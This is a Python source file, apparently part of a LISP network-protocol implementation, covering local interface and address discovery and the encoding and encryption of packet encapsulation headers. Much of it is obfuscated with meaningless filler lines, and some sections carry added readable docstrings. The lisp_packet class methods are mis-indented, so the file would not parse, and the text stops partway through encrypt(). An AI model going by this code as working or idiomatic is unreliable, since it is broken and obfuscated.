if 89 - 89: I1IiiI . Oo0Ooo + I1ii11iIi11i . O0 % o0oOOo0O0Ooo
if 84 - 84: OoooooooOO + I1Ii111 / I1IiiI % OOooOOo % I1ii11iIi11i * I1IiiI
if 58 - 58: OoO0O00 - OoOoOO00 . i11iIiiIii % i11iIiiIii / i1IIi / oO0o
if 24 - 24: I1IiiI * i1IIi % ooOoO0o / O0 + i11iIiiIii
if 12 - 12: I1ii11iIi11i / Ii1I
if 5 - 5: OoooooooOO
def lisp_get_interface_address(device):
    """Return the first IPv4 address configured on interface 'device'
    as a lisp_address, or None when the device does not exist or has no
    IPv4 address."""
    if device not in netifaces.interfaces():
        return None

    addresses = netifaces.ifaddresses(device)
    if netifaces.AF_INET not in addresses:
        return None

    result = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    # Only the first AF_INET entry is considered.
    for entry in addresses[netifaces.AF_INET]:
        result.store_address(entry["addr"])
        return result
    return None
if 93 - 93: ooOoO0o
if 34 - 34: oO0o - ooOoO0o * Oo0Ooo / o0oOOo0O0Ooo
if 19 - 19: I1ii11iIi11i
if 46 - 46: iIii1I11I1II1 . i11iIiiIii - OoOoOO00 % O0 / II111iiii * i1IIi
if 66 - 66: O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
if 7 - 7: o0oOOo0O0Ooo % IiII * OoOoOO00
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
def lisp_get_input_interface(packet):
    """From the first 12 bytes of an Ethernet frame (dest MAC then
    source MAC), return ([interface names], source-mac-hex,
    dest-mac-hex, source-is-local) using the lisp_mymacs table; the
    interface list is ["?"] when neither MAC is local."""
    macs = lisp_format_packet(packet[0:12]).replace(" ", "")
    dest_mac = macs[0:12]
    source_mac = macs[12::]

    try:
        source_is_mine = source_mac in lisp_mymacs
    except:
        source_is_mine = False

    if dest_mac in lisp_mymacs:
        return (lisp_mymacs[dest_mac], source_mac, dest_mac, source_is_mine)
    if source_is_mine:
        return (lisp_mymacs[source_mac], source_mac, dest_mac, source_is_mine)
    return (["?"], source_mac, dest_mac, source_is_mine)
if 4 - 4: OOooOOo / iII111i * I11i - Oo0Ooo * I1IiiI
if 6 - 6: Ii1I
if 77 - 77: i1IIi + OoO0O00 . I1IiiI * OOooOOo / IiII / Ii1I
if 84 - 84: OoO0O00 / iIii1I11I1II1
if 33 - 33: i1IIi / I1Ii111 - i1IIi . Oo0Ooo
if 18 - 18: Oo0Ooo / O0 + iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
def lisp_get_local_interfaces():
    """Register a lisp_interface entry for every interface the OS
    reports via netifaces."""
    for device in netifaces.interfaces():
        lisp_interface(device).add_interface()
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
if 25 - 25: II111iiii / OoO0O00
if 64 - 64: O0 % ooOoO0o
def lisp_get_loopback_address():
    """Return the first address on interface "lo" other than 127.0.0.1,
    or None when only the standard loopback address is configured."""
    for entry in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
        if entry["peer"] != "127.0.0.1":
            return entry["peer"]
    return None
if 77 - 77: i11iIiiIii % IiII + I1Ii111 % OoooooooOO - I11i
if 26 - 26: Oo0Ooo + O0 - iIii1I11I1II1
if 47 - 47: OoooooooOO
if 2 - 2: OoOoOO00 % I1Ii111 * Oo0Ooo * OoOoOO00
if 65 - 65: i11iIiiIii + Oo0Ooo * OoooooooOO - OoO0O00
if 26 - 26: o0oOOo0O0Ooo % OOooOOo + OOooOOo % I11i * i11iIiiIii / iII111i
if 64 - 64: oO0o % OoOoOO00 / II111iiii % ooOoO0o - iII111i
if 2 - 2: I1Ii111 - I1ii11iIi11i + o0oOOo0O0Ooo * OoO0O00 / iII111i
def lisp_is_mac_string(mac_str):
    """Return True when 'mac_str' looks like the "xxxx-xxxx-xxxx" MAC
    notation (14 characters, exactly two dashes), optionally followed by
    a "/<len>" suffix which is ignored."""
    pieces = mac_str.split("/")
    if len(pieces) == 2:
        mac_str = pieces[0]
    return len(mac_str) == 14 and mac_str.count("-") == 2
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
if 70 - 70: I11i - Oo0Ooo / OoooooooOO % OoooooooOO
if 95 - 95: OoooooooOO % OoooooooOO . Ii1I
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
def lisp_get_local_macs():
    """Populate the global lisp_mymacs table, mapping each local MAC
    address (12 hex digits, separators stripped) to the list of
    interface names that carry it.

    BUG FIX: the original stripped ":" from the interface name and then
    immediately discarded that result by re-running replace("-") on the
    unmodified name, so names containing ":" (e.g. "eth0:1") always
    failed the isalnum() check. The replace() calls are now chained.
    """
    for device in netifaces.interfaces():
        # Normalize the interface name before the alphanumeric sanity
        # check; names with other punctuation are skipped.
        name = device.replace(":", "").replace("-", "")
        if name.isalnum() == False:
            continue

        # Some interfaces raise when queried; skip them.
        try:
            addresses = netifaces.ifaddresses(device)
        except:
            continue

        if netifaces.AF_LINK not in addresses:
            continue
        mac = addresses[netifaces.AF_LINK][0]["addr"]
        mac = mac.replace(":", "")

        # Skip malformed or short link-layer addresses.
        if len(mac) < 12:
            continue

        if mac not in lisp_mymacs:
            lisp_mymacs[mac] = []
        lisp_mymacs[mac].append(device)

    lprint("Local MACs are: {}".format(lisp_mymacs))
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
if 46 - 46: iIii1I11I1II1
if 70 - 70: i1IIi . I11i
if 74 - 74: I11i
if 58 - 58: iIii1I11I1II1 * OoO0O00 * I1Ii111 * ooOoO0o . OoooooooOO
def lisp_get_local_rloc ( ) :
    """
    Return a lisp_address with the IPv4 address of the interface carrying
    the default route, or an empty IPv4 lisp_address when none can be
    found.  Shells out to netstat and ifconfig/ip.
    """

    #
    # Find the egress device from the first default-route line.
    #
    II1IIiiI1 = commands . getoutput ( "netstat -rn | egrep 'default|0.0.0.0'" )
    if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
    if 96 - 96: OOooOOo + OOooOOo % IiII % OOooOOo
    if 28 - 28: iIii1I11I1II1 + OoOoOO00 . o0oOOo0O0Ooo % i11iIiiIii
    if 58 - 58: I11i / OoooooooOO % oO0o + OoO0O00
    if 58 - 58: O0
    II1IIiiI1 = II1IIiiI1 . split ( "\n" ) [ 0 ]
    OoO0o0OOOO = II1IIiiI1 . split ( ) [ - 1 ]
    if 91 - 91: iII111i / I1ii11iIi11i . iII111i - o0oOOo0O0Ooo + I1ii11iIi11i
    IiiIIi1 = ""
    O00 = lisp_is_macos ( )
    if ( O00 ) :
        # macOS: list the "inet" lines of the egress device.
        II1IIiiI1 = commands . getoutput ( "ifconfig {} | egrep 'inet '" . format ( OoO0o0OOOO ) )
        if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
    else :
        # Linux: try "ip addr show" for the device; fall back to a global
        # address on loopback (seen in some container setups).
        ooO0ooooO = 'ip addr show | egrep "inet " | egrep "{}"' . format ( OoO0o0OOOO )
        II1IIiiI1 = commands . getoutput ( ooO0ooooO )
        if ( II1IIiiI1 == "" ) :
            ooO0ooooO = 'ip addr show | egrep "inet " | egrep "global lo"'
            II1IIiiI1 = commands . getoutput ( ooO0ooooO )
        if 86 - 86: ooOoO0o
        if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
    if 51 - 51: OoO0O00 - i11iIiiIii * I1IiiI
    if 95 - 95: OOooOOo % I1ii11iIi11i + o0oOOo0O0Ooo % ooOoO0o
    if 36 - 36: O0 / i1IIi % II111iiii / iII111i
    if 96 - 96: Oo0Ooo / oO0o . II111iiii . Oo0Ooo
    if 91 - 91: II111iiii . OOooOOo + o0oOOo0O0Ooo
    if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
    IiiIIi1 = ""
    II1IIiiI1 = II1IIiiI1 . split ( "\n" )
    if 100 - 100: oO0o . iIii1I11I1II1 . iIii1I11I1II1
    # NOTE(review): the loop returns on its first iteration, so only the
    # first "inet" line is ever considered.
    for oOOo0ooO0 in II1IIiiI1 :
        OO0o = oOOo0ooO0 . split ( ) [ 1 ]
        # Linux "ip addr" prints addr/prefix; strip the prefix length.
        if ( O00 == False ) : OO0o = OO0o . split ( "/" ) [ 0 ]
        ii1i1II11II1i = lisp_address ( LISP_AFI_IPV4 , OO0o , 32 , 0 )
        return ( ii1i1II11II1i )
    if 95 - 95: I11i + o0oOOo0O0Ooo * I1ii11iIi11i
    return ( lisp_address ( LISP_AFI_IPV4 , IiiIIi1 , 32 , 0 ) )
if 85 - 85: i11iIiiIii . OoooooooOO - iIii1I11I1II1
if 38 - 38: I11i . I11i * oO0o / OoooooooOO % ooOoO0o
if 80 - 80: OoO0O00 / IiII * I1IiiI % IiII
if 95 - 95: O0 / I11i . I1Ii111
if 17 - 17: I11i
if 56 - 56: ooOoO0o * o0oOOo0O0Ooo + I11i
if 48 - 48: IiII * OoO0O00 % I1Ii111 - I11i
if 72 - 72: i1IIi % ooOoO0o % IiII % oO0o - oO0o
if 97 - 97: o0oOOo0O0Ooo * O0 / o0oOOo0O0Ooo * OoO0O00 * Oo0Ooo
if 38 - 38: I1Ii111
if 25 - 25: iIii1I11I1II1 % II111iiii / I11i / I1ii11iIi11i
def lisp_get_local_addresses ( ) :
    """
    Select the local RLOC addresses and store them in global lisp_myrlocs
    as [ipv4-lisp_address, ipv6-lisp_address, device-name].  Honors the
    LISP_ADDR_SELECT environment variable ("device", "index", or
    "device:index", index 1-based).  Returns True when an IPv4 address
    was found.
    """
    global lisp_myrlocs
    if 22 - 22: oO0o * iII111i
    if 4 - 4: OoOoOO00 - oO0o + I1IiiI
    if 36 - 36: IiII
    if 19 - 19: OoOoOO00 . o0oOOo0O0Ooo . OoooooooOO
    if 13 - 13: OOooOOo . Oo0Ooo / II111iiii
    if 43 - 43: iIii1I11I1II1 % OoO0O00
    if 84 - 84: Oo0Ooo
    if 44 - 44: OoooooooOO * i11iIiiIii / Oo0Ooo
    if 75 - 75: OoooooooOO . OOooOOo + OoO0O00 / Ii1I - I1IiiI % Ii1I
    if 89 - 89: iII111i * iIii1I11I1II1 + i11iIiiIii . OoooooooOO

    #
    # Parse LISP_ADDR_SELECT into a device filter and/or address index.
    #
    O0O0 = None
    ooo = 1
    oO0oo = os . getenv ( "LISP_ADDR_SELECT" )
    if ( oO0oo != None and oO0oo != "" ) :
        oO0oo = oO0oo . split ( ":" )
        if ( len ( oO0oo ) == 2 ) :
            O0O0 = oO0oo [ 0 ]
            ooo = oO0oo [ 1 ]
        else :
            # A bare digit is an index, anything else a device name.
            if ( oO0oo [ 0 ] . isdigit ( ) ) :
                ooo = oO0oo [ 0 ]
            else :
                O0O0 = oO0oo [ 0 ]
            if 52 - 52: IiII % ooOoO0o
            if 25 - 25: I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
        ooo = 1 if ( ooo == "" ) else int ( ooo )
    if 23 - 23: i11iIiiIii
    if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo

    # Result triple: [ipv4, ipv6, device].
    ooOOo = [ None , None , None ]
    i1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
    iii1IiiiI1i1 = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
    IIIiI1i1 = None
    if 13 - 13: OOooOOo * I11i / O0 * o0oOOo0O0Ooo
    for OoO0o0OOOO in netifaces . interfaces ( ) :
        if ( O0O0 != None and O0O0 != OoO0o0OOOO ) : continue
        IIiiI = netifaces . ifaddresses ( OoO0o0OOOO )
        if ( IIiiI == { } ) : continue
        if 35 - 35: i1IIi * i11iIiiIii % I1ii11iIi11i / IiII / IiII
        if 91 - 91: OoO0O00 * I1Ii111 % OoO0O00 . o0oOOo0O0Ooo * I1ii11iIi11i . OOooOOo
        if 13 - 13: I1ii11iIi11i
        if 80 - 80: Oo0Ooo % IiII % OoooooooOO * Oo0Ooo % Ii1I
        IIIiI1i1 = lisp_get_interface_instance_id ( OoO0o0OOOO , None )
        if 41 - 41: OoooooooOO / i1IIi
        if 70 - 70: OoOoOO00 % o0oOOo0O0Ooo % i1IIi / I1ii11iIi11i % i11iIiiIii / i1IIi
        if 4 - 4: IiII
        if 93 - 93: oO0o % i1IIi

        #
        # Pick the ooo'th usable IPv4 address on this device, skipping
        # loopback, link-local, 0.0.0.0 and database-mapping EIDs.
        #
        if ( IIiiI . has_key ( netifaces . AF_INET ) ) :
            IIi1 = IIiiI [ netifaces . AF_INET ]
            OO = 0
            for IiiIIi1 in IIi1 :
                i1 . store_address ( IiiIIi1 [ "addr" ] )
                if ( i1 . is_ipv4_loopback ( ) ) : continue
                if ( i1 . is_ipv4_link_local ( ) ) : continue
                if ( i1 . address == 0 ) : continue
                OO += 1
                i1 . instance_id = IIIiI1i1
                if ( O0O0 == None and
                    lisp_db_for_lookups . lookup_cache ( i1 , False ) ) : continue
                ooOOo [ 0 ] = i1
                if ( OO == ooo ) : break
            if 61 - 61: I11i . I11i - OoO0O00
        if 62 - 62: iII111i . iII111i

        #
        # Same selection for IPv6, skipping link-local and loopback.
        #
        if ( IIiiI . has_key ( netifaces . AF_INET6 ) ) :
            OoO0oO = IIiiI [ netifaces . AF_INET6 ]
            OO = 0
            for IiiIIi1 in OoO0oO :
                oo0o00OO = IiiIIi1 [ "addr" ]
                iii1IiiiI1i1 . store_address ( oo0o00OO )
                if ( iii1IiiiI1i1 . is_ipv6_string_link_local ( oo0o00OO ) ) : continue
                if ( iii1IiiiI1i1 . is_ipv6_loopback ( ) ) : continue
                OO += 1
                iii1IiiiI1i1 . instance_id = IIIiI1i1
                if ( O0O0 == None and
                    lisp_db_for_lookups . lookup_cache ( iii1IiiiI1i1 , False ) ) : continue
                ooOOo [ 1 ] = iii1IiiiI1i1
                if ( OO == ooo ) : break
            if 22 - 22: ooOoO0o / ooOoO0o - Ii1I % I11i . OOooOOo + IiII
        if 64 - 64: i1IIi % I1ii11iIi11i / Ii1I % OoooooooOO
        if 24 - 24: I1Ii111 + OoooooooOO . IiII / OoOoOO00 / I11i
        if 65 - 65: OoooooooOO
        if 18 - 18: O0 - i1IIi . I1Ii111
        if 98 - 98: o0oOOo0O0Ooo

        # Keep scanning devices until one yields an IPv4 address.
        if ( ooOOo [ 0 ] == None ) : continue
        if 73 - 73: Oo0Ooo - iII111i . oO0o % i1IIi . O0
        ooOOo [ 2 ] = OoO0o0OOOO
        break
    if 15 - 15: ooOoO0o . iIii1I11I1II1 * I1IiiI % I11i
    if 21 - 21: OoO0O00 - I1IiiI . OoooooooOO

    #
    # Log what was selected and publish the result globally.
    #
    Ii1iiI1i1 = ooOOo [ 0 ] . print_address_no_iid ( ) if ooOOo [ 0 ] else "none"
    iIi = ooOOo [ 1 ] . print_address_no_iid ( ) if ooOOo [ 1 ] else "none"
    OoO0o0OOOO = ooOOo [ 2 ] if ooOOo [ 2 ] else "none"
    if 88 - 88: iII111i * OoooooooOO . iIii1I11I1II1
    O0O0 = " (user selected)" if O0O0 != None else ""
    if 11 - 11: oO0o + I1Ii111 . IiII * OoooooooOO - I1ii11iIi11i - OOooOOo
    Ii1iiI1i1 = red ( Ii1iiI1i1 , False )
    iIi = red ( iIi , False )
    OoO0o0OOOO = bold ( OoO0o0OOOO , False )
    lprint ( "Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}" . format ( Ii1iiI1i1 , iIi , OoO0o0OOOO , O0O0 , IIIiI1i1 ) )
    if 16 - 16: iII111i / iIii1I11I1II1 + OOooOOo * iII111i * I11i
    if 8 - 8: I1Ii111
    lisp_myrlocs = ooOOo
    return ( ( ooOOo [ 0 ] != None ) )
if 15 - 15: Oo0Ooo / Ii1I % O0 + I1ii11iIi11i
if 96 - 96: ooOoO0o . OoooooooOO
if 39 - 39: OOooOOo + OoO0O00
if 80 - 80: OOooOOo % OoO0O00 / OoOoOO00
if 54 - 54: Oo0Ooo % OoO0O00 - OOooOOo - I11i
if 71 - 71: ooOoO0o . i11iIiiIii
if 56 - 56: O0 * iII111i + iII111i * iIii1I11I1II1 / ooOoO0o * I1Ii111
if 25 - 25: iIii1I11I1II1 . I11i * i11iIiiIii + Oo0Ooo * I11i
if 67 - 67: iII111i
def lisp_get_all_addresses ( ) :
    """
    Return a list of every IPv4 and IPv6 address string configured on
    this system, excluding IPv4 loopback, IPv6 loopback ("::1") and
    IPv6 link-local ("fe80:...") addresses.
    """
    address_list = [ ]
    for device in netifaces . interfaces ( ) :
        # Some devices cannot report addresses; just skip them.
        try :
            per_family = netifaces . ifaddresses ( device )
        except :
            continue

        for entry in per_family . get ( netifaces . AF_INET , [ ] ) :
            v4 = entry [ "addr" ]
            if ( v4 . find ( "127.0.0.1" ) == - 1 ) : address_list . append ( v4 )

        for entry in per_family . get ( netifaces . AF_INET6 , [ ] ) :
            v6 = entry [ "addr" ]
            if ( v6 == "::1" ) : continue
            if ( v6 [ 0 : 5 ] == "fe80:" ) : continue
            address_list . append ( v6 )

    return ( address_list )
if 29 - 29: Ii1I / ooOoO0o % I11i
if 10 - 10: iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
if 63 - 63: iIii1I11I1II1 % o0oOOo0O0Ooo * ooOoO0o
if 79 - 79: O0
def lisp_get_all_multicast_rles ( ) :
    """
    Grep ./lisp.config for "rle-address =" entries and return the list of
    RLE addresses whose first octet is in the IPv4 multicast range
    (224.0.0.0 - 239.255.255.255).  Comment lines are skipped.
    """
    IiI = [ ]
    II1IIiiI1 = commands . getoutput ( 'egrep "rle-address =" ./lisp.config' )
    if ( II1IIiiI1 == "" ) : return ( IiI )
    if 9 - 9: II111iiii % OoOoOO00
    IiiIi1I11 = II1IIiiI1 . split ( "\n" )
    for oOOo0ooO0 in IiiIi1I11 :
        if ( oOOo0ooO0 [ 0 ] == "#" ) : continue
        i1I1Ii11II1i = oOOo0ooO0 . split ( "rle-address = " ) [ 1 ]
        # Keep only addresses with a multicast first octet.
        oooOoOOoOO0O = int ( i1I1Ii11II1i . split ( "." ) [ 0 ] )
        if ( oooOoOOoOO0O >= 224 and oooOoOOoOO0O < 240 ) : IiI . append ( i1I1Ii11II1i )
    if 9 - 9: I1Ii111 * OoooooooOO % I1IiiI / OoOoOO00 * I11i
    return ( IiI )
if 48 - 48: OoooooooOO . OoOoOO00
if 65 - 65: oO0o . Oo0Ooo
if 94 - 94: OoOoOO00 + IiII . ooOoO0o
if 69 - 69: O0 - O0
if 41 - 41: IiII % o0oOOo0O0Ooo
if 67 - 67: O0 % I1Ii111
if 35 - 35: I1IiiI . OoOoOO00 + OoooooooOO % Oo0Ooo % OOooOOo
if 39 - 39: Ii1I
class lisp_packet ( ) :
def __init__ ( self , packet ) :
    """
    Hold one data packet plus the parsed fields of its outer
    (encapsulation) IP/UDP/LISP headers and its inner header.
    "packet" is the raw packet buffer.
    """
    # Outer (encapsulation) IP header fields.
    self . outer_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
    self . outer_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
    self . outer_tos = 0
    self . outer_ttl = 0
    # Outer UDP header fields.
    self . udp_sport = 0
    self . udp_dport = 0
    self . udp_length = 0
    self . udp_checksum = 0
    # Inner (original) IP header fields.
    self . inner_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
    self . inner_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
    self . inner_tos = 0
    self . inner_ttl = 0
    self . inner_protocol = 0
    self . inner_sport = 0
    self . inner_dport = 0
    # LISP data header, raw buffer, and bookkeeping state.
    self . lisp_header = lisp_data_header ( )
    self . packet = packet
    self . inner_version = 0
    self . outer_version = 0
    self . encap_port = LISP_DATA_PORT
    self . inner_is_fragment = False
    self . packet_error = ""
    self . gleaned_dest = False
if 60 - 60: OOooOOo
if 62 - 62: I1Ii111 * I11i
def encode ( self , nonce ) :
    """
    Prepend the LISP encapsulation (outer IP header, outer UDP header,
    LISP data header) to self.packet, optionally encrypting the payload
    first.  Returns self on success, None when no outer source is set or
    the outer version is unsupported.  Note: only an IPv4 outer header is
    built here; outer_version 6 leaves the IP header empty ("").
    """
    if 74 - 74: OoOoOO00 . iIii1I11I1II1
    if 87 - 87: ooOoO0o
    if 41 - 41: OoOoOO00 . iIii1I11I1II1 % ooOoO0o + O0
    if 22 - 22: o0oOOo0O0Ooo + Oo0Ooo . ooOoO0o + I1ii11iIi11i * iII111i . i11iIiiIii
    if 90 - 90: OOooOOo * OoOoOO00 - Oo0Ooo + o0oOOo0O0Ooo
    if ( self . outer_source . is_null ( ) ) : return ( None )
    if 53 - 53: OoooooooOO . OoooooooOO + o0oOOo0O0Ooo - iII111i + OOooOOo
    if 44 - 44: I1Ii111 - IiII
    if 100 - 100: oO0o . OoO0O00 - Ii1I + O0 * OoO0O00
    if 59 - 59: II111iiii
    if 43 - 43: Oo0Ooo + OoooooooOO
    if 47 - 47: ooOoO0o

    #
    # Fill in the LISP header nonce: fresh, echoed request-nonce, or
    # caller supplied.
    #
    if ( nonce == None ) :
        self . lisp_header . nonce ( lisp_get_data_nonce ( ) )
    elif ( self . lisp_header . is_request_nonce ( nonce ) ) :
        self . lisp_header . request_nonce ( nonce )
    else :
        self . lisp_header . nonce ( nonce )
    if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
    self . lisp_header . instance_id ( self . inner_dest . instance_id )
    if 23 - 23: II111iiii * iII111i
    if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
    if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
    if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
    if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
    if 21 - 21: OoO0O00

    #
    # Optionally encrypt the payload when data-plane security is on and
    # an encap key exists for this RLOC (iid 0xffffff is excluded).
    #
    self . lisp_header . key_id ( 0 )
    O0o0oOOO = ( self . lisp_header . get_instance_id ( ) == 0xffffff )
    if ( lisp_data_plane_security and O0o0oOOO == False ) :
        oo0o00OO = self . outer_dest . print_address_no_iid ( ) + ":" + str ( self . encap_port )
        if 24 - 24: o0oOOo0O0Ooo / Ii1I / Ii1I % II111iiii - oO0o * oO0o
        if ( lisp_crypto_keys_by_rloc_encap . has_key ( oo0o00OO ) ) :
            oOoo0oO = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
            if ( oOoo0oO [ 1 ] ) :
                oOoo0oO [ 1 ] . use_count += 1
                IIii1i , o00oo = self . encrypt ( oOoo0oO [ 1 ] , oo0o00OO )
                if ( o00oo ) : self . packet = IIii1i
    if 18 - 18: i11iIiiIii - ooOoO0o * oO0o + o0oOOo0O0Ooo
    if 16 - 16: OoooooooOO * i11iIiiIii . OoooooooOO - iIii1I11I1II1 * i1IIi
    if 33 - 33: I1Ii111 % II111iiii
    if 49 - 49: I1ii11iIi11i + I11i / o0oOOo0O0Ooo + OoooooooOO + OOooOOo / IiII
    if 29 - 29: Ii1I - Ii1I / ooOoO0o
    if 49 - 49: I11i + oO0o % OoO0O00 - Oo0Ooo - O0 - OoooooooOO
    if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
    if 18 - 18: Oo0Ooo % O0

    #
    # Choose the UDP source port: the crypto ephemeral port when one is
    # negotiated; the LISP data port for gleaned destinations; otherwise
    # hash_packet() derives a flow-based source port.
    #
    self . udp_checksum = 0
    if ( self . encap_port == LISP_DATA_PORT ) :
        if ( lisp_crypto_ephem_port == None ) :
            if ( self . gleaned_dest ) :
                self . udp_sport = LISP_DATA_PORT
            else :
                self . hash_packet ( )
            if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
        else :
            self . udp_sport = lisp_crypto_ephem_port
        if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
    else :
        self . udp_sport = LISP_DATA_PORT
    if 86 - 86: IiII
    self . udp_dport = self . encap_port
    # UDP length = payload + 8-byte UDP header + 8-byte LISP header.
    self . udp_length = len ( self . packet ) + 16
    if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
    if 33 - 33: II111iiii - IiII - ooOoO0o
    if 92 - 92: OoO0O00 * IiII
    if 92 - 92: oO0o

    #
    # UDP ports are byte-swapped only for an IPv4 outer header (raw
    # socket convention used elsewhere in this file).
    #
    if ( self . outer_version == 4 ) :
        i1i1IIiII1I = socket . htons ( self . udp_sport )
        OOO = socket . htons ( self . udp_dport )
    else :
        i1i1IIiII1I = self . udp_sport
        OOO = self . udp_dport
    if 3 - 3: i11iIiiIii
    if 11 - 11: OoO0O00 % OoooooooOO
    # NOTE(review): this line recomputes the same value assigned just
    # above; it is redundant but harmless.
    OOO = socket . htons ( self . udp_dport ) if self . outer_version == 4 else self . udp_dport
    if 20 - 20: I1Ii111 + I1Ii111 * II111iiii * iIii1I11I1II1 % O0 * I1IiiI
    if 62 - 62: OoooooooOO / OoOoOO00 . IiII . IiII % ooOoO0o
    o0oOo00 = struct . pack ( "HHHH" , i1i1IIiII1I , OOO , socket . htons ( self . udp_length ) ,
        self . udp_checksum )
    if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
    if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
    if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
    if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
    O0oooo0O = self . lisp_header . encode ( )
    if 15 - 15: i1IIi % OoooooooOO * OOooOOo . II111iiii + O0 * OoO0O00
    if 16 - 16: O0 - O0 / I11i - OoO0O00
    if 30 - 30: o0oOOo0O0Ooo - OoO0O00 + OOooOOo
    if 65 - 65: O0 / II111iiii . iIii1I11I1II1 . oO0o / Oo0Ooo % iIii1I11I1II1
    if 74 - 74: i1IIi / I1IiiI % I1ii11iIi11i / O0 % I11i - OoOoOO00

    #
    # Build the outer IPv4 header (DF bit set, protocol 17/UDP, checksum
    # computed here).  IPv6 outer headers are not built in this method.
    #
    if ( self . outer_version == 4 ) :
        Iiii = socket . htons ( self . udp_length + 20 )
        oO = socket . htons ( 0x4000 )
        ii11I = struct . pack ( "BBHHHBBH" , 0x45 , self . outer_tos , Iiii , 0xdfdf ,
            oO , self . outer_ttl , 17 , 0 )
        ii11I += self . outer_source . pack_address ( )
        ii11I += self . outer_dest . pack_address ( )
        ii11I = lisp_ip_checksum ( ii11I )
    elif ( self . outer_version == 6 ) :
        ii11I = ""
        if 97 - 97: i1IIi + iII111i . ooOoO0o - iII111i
        if 53 - 53: O0 . I1IiiI
        if 74 - 74: ooOoO0o % OoOoOO00 / Oo0Ooo
        if 2 - 2: IiII % IiII % I1Ii111
        if 60 - 60: OOooOOo
        if 73 - 73: ooOoO0o
        if 86 - 86: OoOoOO00 . I11i / Oo0Ooo * I11i
    else :
        return ( None )
    if 20 - 20: ooOoO0o - OOooOOo * OoO0O00 * o0oOOo0O0Ooo * OOooOOo / IiII
    if 40 - 40: I1IiiI * o0oOOo0O0Ooo . I1IiiI
    self . packet = ii11I + o0oOo00 + O0oooo0O + self . packet
    return ( self )
if 62 - 62: ooOoO0o + II111iiii % ooOoO0o
if 50 - 50: OoooooooOO + oO0o * I1IiiI - Ii1I / i11iIiiIii
def cipher_pad ( self , packet ) :
    """
    Pad packet with trailing spaces (str.ljust) so its length is a
    multiple of 16 bytes, the AES block size.  Returns the possibly
    padded packet.
    """
    iiiIIiiIi = len ( packet )
    if ( ( iiiIIiiIi % 16 ) != 0 ) :
        # Use explicit floor division ("//") so the block arithmetic is
        # correct under both python2 and python3 (the original "/" only
        # floors on python2).
        Oooo0oOooOO = ( ( iiiIIiiIi // 16 ) + 1 ) * 16
        packet = packet . ljust ( Oooo0oOooOO )
    return ( packet )
if 68 - 68: OOooOOo - OoooooooOO
if 14 - 14: O0 / oO0o - Oo0Ooo - IiII
def encrypt ( self , key , addr_str ) :
    """
    Encrypt self.packet with the given lisp-keys object and compute the
    ICV.  Returns [ciphertext, True] on success where ciphertext is
    iv + encrypted-payload + packed-ICV, or [self.packet, False] when no
    usable key exists or encryption fails.  addr_str is the RLOC string
    used for logging only.
    """
    if ( key == None or key . shared_key == None ) :
        return ( [ self . packet , False ] )
    if 44 - 44: OoO0O00
